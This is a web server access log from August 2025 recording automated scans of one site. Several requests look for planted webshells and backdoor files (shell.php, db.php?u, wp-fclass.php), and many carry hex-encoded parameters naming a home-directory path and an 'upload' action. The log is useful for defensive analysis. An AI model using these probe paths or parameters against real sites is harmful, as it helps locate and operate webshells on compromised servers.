216.73.216.186 - - [12/Aug/2025:12:37:59 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.16.113.252 - - [12/Aug/2025:12:38:09 -0400] "GET /inputs.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:39:16 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:39:54 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:40:46 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:40:57 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
209.38.125.40 - - [12/Aug/2025:12:41:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:12:41:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.50.215.205 - - [12/Aug/2025:12:41:59 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:12:41:59 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:12:42:12 -0400] "GET /simple.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:42:15 -0400] "GET /classwithtostring.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:42:21 -0400] "GET /install.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:42:40 -0400] "GET /admin.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:42:53 -0400] "GET /chosen.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
146.190.11.185 - - [12/Aug/2025:12:43:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:12:43:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:12:43:34 -0400] "GET /wp-includes/js/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
164.90.241.135 - - [12/Aug/2025:12:43:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:12:43:35 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:12:43:40 -0400] "GET /wp-includes/sodium_compat/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:43:52 -0400] "GET /wp-includes/fonts/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:44:00 -0400] "GET /wp-includes/Text/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:44:06 -0400] "GET /wp-admin/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:44:48 -0400] "GET /wp-content/uploads/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 347 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:00 -0400] "GET /wp-includes/images/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 347 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:06 -0400] "GET /demo.oksypay.com/cgi-bin/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
86.8.204.43 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:12:45:23 -0400] "GET /wp-includes/SimplePie/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:27 -0400] "GET /wp-includes/widgets/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 348 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:34 -0400] "GET /assets/mbr-switch-arrow/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:35 -0400] "GET /wp-includes/random_compat/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:38 -0400] "GET /v1/pdf/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:42 -0400] "GET /tpcx/images/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:45:44 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:46:18 -0400] "GET /wp-includes/pomo/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:47:17 -0400] "GET /wp-content/uploads/complianz/snapshots/shell.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:47:22 -0400] "GET /wp-admin/css/classwithtostring.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:47:34 -0400] "GET /wp-admin/classwithtostring.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:47:45 -0400] "GET /wp-includes/images/crystal/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:47:58 -0400] "GET /wp-includes/blocks/media-text/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:48:05 -0400] "GET /wp-includes/Requests/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
152.42.157.60 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:12:48:31 -0400] "GET /wp-content/inputs.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
31.13.115.3 - - [12/Aug/2025:12:50:18 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
94.16.113.252 - - [12/Aug/2025:12:50:45 -0400] "GET /admin.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:52:02 -0400] "GET /admin.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:53:25 -0400] "GET /admin.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:53:32 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:56:30 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
149.50.215.205 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:12:58:06 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:12:59:22 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
86.8.204.43 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:01:13 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
209.38.125.40 - - [12/Aug/2025:13:01:21 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:13:01:21 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:13:01:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:13:01:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
94.16.113.252 - - [12/Aug/2025:13:05:06 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:08:54 -0400] "GET /link.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:09:39 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:10:20 -0400] "GET /admin.php?520 HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:10:31 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
146.190.11.185 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:11:05 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:11:35 -0400] "GET /wp-content/plugins/wp-help/index.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:11:37 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
209.38.125.40 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.50.215.205 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:13:15 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:13:56 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:14:24 -0400] "GET /about.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
68.183.245.101 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
